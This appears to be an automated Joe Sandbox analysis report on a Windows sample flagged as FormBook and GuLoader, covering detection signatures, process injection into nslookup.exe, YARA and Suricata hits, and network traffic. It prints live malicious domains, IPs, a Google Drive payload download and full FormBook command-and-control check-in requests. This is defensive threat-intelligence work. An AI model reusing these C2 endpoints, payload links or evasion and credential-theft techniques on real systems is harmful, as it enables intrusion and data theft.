Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4DttVpYJtB.exe

Overview

General Information

Sample name:4DttVpYJtB.exe
Analysis ID:1634797
MD5:5a37412beea483b52f7a1a7c65932cf7
SHA1:acdd44f0eb9503d12bb5dd53fc2487072ee2be29
SHA256:5518f2e54da7d099bfbc62172e39496d7aba93f6d938966b6b6684c89c548d3c
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses nslookup.exe to query domains
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • 4DttVpYJtB.exe (PID: 4264 cmdline: "C:\Users\user\Desktop\4DttVpYJtB.exe" MD5: 5A37412BEEA483B52F7A1A7C65932CF7)
    • 4DttVpYJtB.exe (PID: 7636 cmdline: "C:\Users\user\Desktop\4DttVpYJtB.exe" MD5: 5A37412BEEA483B52F7A1A7C65932CF7)
      • 29u7VPL5EWJRQ9.exe (PID: 4612 cmdline: "C:\Program Files (x86)\VzkvEFoeeutBCiNOgMNeWVeketbHNftcLthoiRTUYCPPDPVICvliBaXEIaTlKyXnfIhitiQY\Un8xvYwZU.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • nslookup.exe (PID: 5088 cmdline: "C:\Windows\SysWOW64\nslookup.exe" MD5: 9D2EB13476B126CB61B12CDD03C7DCA6)
          • RAVCpl64.exe (PID: 5928 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
          • firefox.exe (PID: 6196 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: 7B12552FD2A5948256B20EC97B708F94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.400026261277.00000000030B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.400026547122.0000000003110000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.396747563920.0000000036ED0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.400025555468.0000000000B70000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.396748461817.0000000037D50000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-11T05:01:18.781512+010020283713Unknown Traffic192.168.11.304982523.209.72.15443TCP
            2025-03-11T05:05:31.224280+010020283713Unknown Traffic192.168.11.304984723.209.72.15443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-11T05:05:22.234611+010020127862Potentially Bad Traffic192.168.11.30600061.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-11T05:04:25.595206+010020507451Malware Command and Control Activity Detected192.168.11.304983013.248.169.4880TCP
            2025-03-11T05:04:48.976431+010020507451Malware Command and Control Activity Detected192.168.11.3049834176.97.198.11580TCP
            2025-03-11T05:05:04.028922+010020507451Malware Command and Control Activity Detected192.168.11.304983847.83.1.9080TCP
            2025-03-11T05:05:17.217413+010020507451Malware Command and Control Activity Detected192.168.11.30498423.33.130.19080TCP
            2025-03-11T05:05:30.991572+010020507451Malware Command and Control Activity Detected192.168.11.304984684.32.84.3280TCP
            2025-03-11T05:05:44.182031+010020507451Malware Command and Control Activity Detected192.168.11.30498513.33.130.19080TCP
            2025-03-11T05:05:58.147996+010020507451Malware Command and Control Activity Detected192.168.11.3049855144.76.229.20380TCP
            2025-03-11T05:06:12.454801+010020507451Malware Command and Control Activity Detected192.168.11.3049859156.234.201.3780TCP
            2025-03-11T05:06:27.604889+010020507451Malware Command and Control Activity Detected192.168.11.304986365.181.134.3880TCP
            2025-03-11T05:06:41.117540+010020507451Malware Command and Control Activity Detected192.168.11.3049867209.74.77.23080TCP
            2025-03-11T05:06:56.592164+010020507451Malware Command and Control Activity Detected192.168.11.30498718.222.228.10780TCP
            2025-03-11T05:07:10.449878+010020507451Malware Command and Control Activity Detected192.168.11.304987546.30.136.13080TCP
            2025-03-11T05:07:24.698228+010020507451Malware Command and Control Activity Detected192.168.11.304987913.248.169.4880TCP
            2025-03-11T05:07:39.015021+010020507451Malware Command and Control Activity Detected192.168.11.304988338.55.237.22180TCP
            2025-03-11T05:07:52.542170+010020507451Malware Command and Control Activity Detected192.168.11.304988763.250.38.12280TCP
            2025-03-11T05:08:06.324599+010020507451Malware Command and Control Activity Detected192.168.11.304989185.215.121.5780TCP
            2025-03-11T05:08:15.628235+010020507451Malware Command and Control Activity Detected192.168.11.304989213.248.169.4880TCP
            2025-03-11T05:08:28.790822+010020507451Malware Command and Control Activity Detected192.168.11.3049896176.97.198.11580TCP
            2025-03-11T05:08:43.513108+010020507451Malware Command and Control Activity Detected192.168.11.304990047.83.1.9080TCP
            2025-03-11T05:08:56.597004+010020507451Malware Command and Control Activity Detected192.168.11.30499043.33.130.19080TCP
            2025-03-11T05:09:10.223436+010020507451Malware Command and Control Activity Detected192.168.11.304990884.32.84.3280TCP
            2025-03-11T05:09:23.306945+010020507451Malware Command and Control Activity Detected192.168.11.30499123.33.130.19080TCP
            2025-03-11T05:09:36.849066+010020507451Malware Command and Control Activity Detected192.168.11.3049916144.76.229.20380TCP
            2025-03-11T05:09:51.823069+010020507451Malware Command and Control Activity Detected192.168.11.3049920156.234.201.3780TCP
            2025-03-11T05:10:06.090974+010020507451Malware Command and Control Activity Detected192.168.11.304992465.181.134.3880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-11T05:03:57.269021+010028032702Potentially Bad Traffic192.168.11.3049828142.251.41.14443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: 4DttVpYJtB.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://www.okoty19.vip/d157/Avira URL Cloud: Label: malware
            Source: http://www.antiviruslab.cyou/9wcy/?KMQKD=pz8TTpInVv4i&blkI1=stolL3vmLIGmoJLV7TJx61LUwbggQc+h55P+tBU1QCVHUuNKfEBFEL215Jq5kzn5OS5qP6O8JxHhNU/2p13ZL2IkpWVysp5nQetmWe2xm45Cit1+RMF/1UY=Avira URL Cloud: Label: malware
            Source: http://www.antiviruslab.cyou/9wcy/Avira URL Cloud: Label: malware
            Source: http://www.okoty19.vip/d157/?blkI1=27OdbQs3uVKd/sKfWa1X1QmTKwkueZ5FDF9iVFMlFgZK/CHmSHC8xH7poFHa9IOGTD7nrOLI8SVCcUuFrhq/EKz04Ygq08x26qMVVorUcIYvhfI9M7013oE=&KMQKD=pz8TTpInVv4iAvira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: 4DttVpYJtB.exeReversingLabs: Detection: 47%
            Source: 4DttVpYJtB.exeVirustotal: Detection: 68%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 00000006.00000002.400026261277.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.400026547122.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.396747563920.0000000036ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.400025555468.0000000000B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.396748461817.0000000037D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.400027902000.0000000003420000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 4DttVpYJtB.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 142.251.41.14:443 -> 192.168.11.30:49828 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.65.193:443 -> 192.168.11.30:49829 version: TLS 1.2
            Source: 4DttVpYJtB.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: wntdll.pdbUGP source: 4DttVpYJtB.exe, 00000004.00000003.396625736882.0000000036C94000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000002.396747642012.000000003712D000.00000040.00001000.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000002.396747642012.0000000037000000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 4DttVpYJtB.exe, 4DttVpYJtB.exe, 00000004.00000003.396625736882.0000000036C94000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000002.396747642012.000000003712D000.00000040.00001000.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000002.396747642012.0000000037000000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 2_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_00405D74
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 2_2_0040699E FindFirstFileW,FindClose,2_2_0040699E
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 2_2_0040290B FindFirstFileW,2_2_0040290B
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B8C8D0 FindFirstFileW,FindNextFileW,FindClose,6_2_00B8C8D0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 4x nop then xor eax, eax6_2_00B79DE0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 4x nop then pop edi6_2_00B7E4E4
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 4x nop then mov ebx, 00000004h6_2_039304D8

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49842 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49851 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49871 -> 8.222.228.107:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49830 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49834 -> 176.97.198.115:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49838 -> 47.83.1.90:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49879 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49896 -> 176.97.198.115:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49900 -> 47.83.1.90:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49892 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49855 -> 144.76.229.203:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49859 -> 156.234.201.37:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49916 -> 144.76.229.203:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49863 -> 65.181.134.38:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49887 -> 63.250.38.122:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49846 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49867 -> 209.74.77.230:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49875 -> 46.30.136.130:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49904 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49883 -> 38.55.237.221:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49891 -> 85.215.121.57:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49912 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49920 -> 156.234.201.37:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49924 -> 65.181.134.38:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.30:49908 -> 84.32.84.32:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.publicblockchain.xyz
            Source: DNS query: www.031234399.xyz
            Source: DNS query: www.neixn.xyz
            Source: DNS query: www.cubeify.xyz
            Uses nslookup.exe to query domains
            Source: C:\Program Files (x86)\VzkvEFoeeutBCiNOgMNeWVeketbHNftcLthoiRTUYCPPDPVICvliBaXEIaTlKyXnfIhitiQY\29u7VPL5EWJRQ9.exeProcess created: C:\Windows\SysWOW64\nslookup.exe "C:\Windows\SysWOW64\nslookup.exe"
            Source: C:\Program Files (x86)\VzkvEFoeeutBCiNOgMNeWVeketbHNftcLthoiRTUYCPPDPVICvliBaXEIaTlKyXnfIhitiQY\29u7VPL5EWJRQ9.exeProcess created: C:\Windows\SysWOW64\nslookup.exe "C:\Windows\SysWOW64\nslookup.exe"Jump to behavior
            Source: Joe Sandbox ViewIP Address: 144.76.229.203 144.76.229.203
            Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
            Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: VODANETInternationalIP-BackboneofVodafoneDE VODANETInternationalIP-BackboneofVodafoneDE
            Source: Joe Sandbox ViewASN Name: STRATOSTRATOAGDE STRATOSTRATOAGDE
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49847 -> 23.209.72.15:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49825 -> 23.209.72.15:443
            Source: Network trafficSuricata IDS: 2012786 - Severity 2 - ET MALWARE DNS Query for Possible FakeAV Domain : 192.168.11.30:60006 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.30:49828 -> 142.251.41.14:443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lu5o8nu4Af_mz0dyhgypeN1IoQWngwE8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1lu5o8nu4Af_mz0dyhgypeN1IoQWngwE8&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /iy1d/?KMQKD=pz8TTpInVv4i&blkI1=ZSfqdeaSZn0PRg5HdNh2oUAHptzY3MYMhDC626GF5PGt8z/G8rv53ZExREZuYXPhFHpYBiyGJNt7vuMK6nZlIfoyt3XPoEEAyqrm2BlCrN47QmvSDY8ChpY= HTTP/1.1Accept: */*Accept-Language: en-USHost: www.publicblockchain.xyzConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficHTTP traffic detected: GET /wv8g/?blkI1=YFLskH/DbjQtzAf6YgMWVDYXr1I+PcRXpzPtlnhpPmstkVM2wVfu8ec6CTTGtp43/+l9tlL+HBZr3lk6kvNfFNIpoa61SSBtKXC3KfwxiADM3Lv4Jry0tQA=&KMQKD=pz8TTpInVv4i HTTP/1.1Accept: */*Accept-Language: en-USHost: www.friendraiser.netConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficHTTP traffic detected: GET /fqe7/?KMQKD=pz8TTpInVv4i&blkI1=USxMWUqxojVByPBa5UT41ok3Moa+5KYfGEhA2ixPIKUlvuR24pNCpxAImz3DKUpd6pSJS1D95qfmGS9U5R/ToLLUYeH3zkBiolzUNHK+DfMbKpSjfwMuc1g= HTTP/1.1Accept: */*Accept-Language: en-USHost: www.arasmm.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficHTTP traffic detected: GET /x0tm/?blkI1=eWDse7+BEFcY5cktXDPZtmHPP3S4Wrj93waxKU4kpmX2tJ5zSY5vSJGFDO0VR6ICah0iz99QU4wn/aaytqL4xYjcyy8X0gJ/duRvvp1PI2IylL7aVOnHlMc=&KMQKD=pz8TTpInVv4i HTTP/1.1Accept: */*Accept-Language: en-USHost: www.kismet.bizConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficHTTP traffic detected: GET /9wcy/?KMQKD=pz8TTpInVv4i&blkI1=stolL3vmLIGmoJLV7TJx61LUwbggQc+h55P+tBU1QCVHUuNKfEBFEL215Jq5kzn5OS5qP6O8JxHhNU/2p13ZL2IkpWVysp5nQetmWe2xm45Cit1+RMF/1UY= HTTP/1.1Accept: */*Accept-Language: en-USHost: www.antiviruslab.cyouConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficHTTP traffic detected: GET /zdje/?blkI1=bH964aYEFZTfPBlDLfXp4nr5ZPhWFhhHj48pqX8NcX3QBJSsXrSljQ+oXrbfRSf9pJthaeqSgvtBiM4dS6oUGNffJZaeVmozHjGX4zuSirREGsOVgdU/LH0=&KMQKD=pz8TTpInVv4i HTTP/1.1Accept: */*Accept-Language: en-USHost: www.temecula.dealsConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficHTTP traffic detected: GET /gubk/?blkI1=WfXZudTo3dip/TkuA4M73rdEBI7C2gZJqR+yv5Ymhwaua4fKE23qrk5g+CAeCheJ0JaqXN05F6vprYiLIN3bzk9uoIFijyVyrx/NoVVttwNY+ojTmaKYgGk=&KMQKD=pz8TTpInVv4i HTTP/1.1Accept: */*Accept-Language: en-USHost: www.031234399.xyzConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficHTTP traffic detected: GET /ux2u/?blkI1=DFNbHI9W2QzgkC5h/j+husawXia3UEqdl74RIrA1ZdizrejP3tXDU/ScEElXet8i6Y7Mlgey/1sIY1NCHdc+MLGxJi0Co8xHHrfzy/Yt5+Q5a4sfhKi+vMU=&KMQKD=pz8TTpInVv4i HTTP/1.1Accept: */*Accept-Language: en-USHost: www.ykkk7.yachtsConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficHTTP traffic detected: GET /d157/?blkI1=27OdbQs3uVKd/sKfWa1X1QmTKwkueZ5FDF9iVFMlFgZK/CHmSHC8xH7poFHa9IOGTD7nrOLI8SVCcUuFrhq/EKz04Ygq08x26qMVVorUcIYvhfI9M7013oE=&KMQKD=pz8TTpInVv4i HTTP/1.1Accept: */*Accept-Language: en-USHost: www.okoty19.vipConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficHTTP traffic detected: GET /c2g9/?blkI1=gEDSCkjUGEYN6Jc5vsx6Y0fTCioUVBQ+04Y502brVYOIQzHWaQ2dP5LPQUV+6nTuRGbjNrN9E0UdWtnP+sO6VAI8vkH+B5jg2lsuQmpm1Y7bXbxGORpT1oU=&KMQKD=pz8TTpInVv4i HTTP/1.1Accept: */*Accept-Language: en-USHost: www.neixn.xyzConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficHTTP traffic detected: GET /qavm/?blkI1=m+xrkADyXulPKiff8BDYbO7HT6WIuHG3dIrhSugZx7S6s4k5LyKYMg3eEJv79IG39BJ+oJGgFnSZ2DJDPSiru4rz4LdebqQdH2lF/jxMbmhsLCV6hUou9bA=&KMQKD=pz8TTpInVv4i HTTP/1.1Accept: */*Accept-Language: en-USHost: www.knowesis.appConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficHTTP traffic detected: GET /m95r/?blkI1=B/PvttMDg2kGkBEuiRNkwUkE6xWuLSgXIjwI58vc1j7ntDWDIeJkMRIxtvMXRMMo3CQVkVwFrgk1LVqUWqxVXx3WiLKoAa56DX7jLzeIFbmOLdKUcIT1Y0c=&KMQKD=pz8TTpInVv4i HTTP/1.1Accept: */*Accept-Language: en-USHost: www.essense.ltdConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficHTTP traffic detected: GET /1bg6/?blkI1=xDluvL+/XX/BmJfVDnGbU72j0zk7cLCmuGMjpwSLmpKXyaUQNSVEWyoV3Hh5LzuqjOdlT3UFUrkIl5LmsOnozQJDyqC2Mw0Pc409TsV00jcxN7nbdcugTqY=&KMQKD=pz8TTpInVv4i HTTP/1.1Accept: */*Accept-Language: en-USHost: www.cubeify.xyzConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficHTTP traffic detected: GET /q0f0/?blkI1=/9Ax3H/Ejvgc7hGDyHgkM12XF4pJX4w4KQ8AlT5XO2Y+Hz+ymgTRff61ou99nLnBSGbtYEtuIK0PVGL9CXKQm6H+RNZOxyMYbiovphwJovYQ4e89BcSf8cQ=&KMQKD=pz8TTpInVv4i HTTP/1.1Accept: */*Accept-Language: en-USHost: www.580051.proConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficHTTP traffic detected: GET /hmst/?blkI1=Wc34O8rsFyl1EOnIWU/RiS7M5q1jwXMrZaoNW8Ftqj27kTrAAU6O8UrpCpFdFDiQWjHUBlJ9BocGn00cE1jVmzrylBBjZt6NTXfEBFErGc/Ef130jRTLlc4=&KMQKD=pz8TTpInVv4i HTTP/1.1Accept: */*Accept-Language: en-USHost: www.mobilegaruda.proConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
            Source: global trafficHTTP traffic detected: GET /zqig/?blkI1=F5kXHttbCJDHzBVi4vjBlaljwjrSQaJZ+iEjCcLUd/na3LOUxY2fuv3RjcUu6lLSwzOROG9xSYqdMCy+5Ny+SP6X47IZm/T+TGbclyoZNAC8ENhMputQwF4=&KMQKD=pz8TTpInVv4i HTTP/1.1Accept: */*Accept-Language: en-USHost: www.loonerverse.appConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
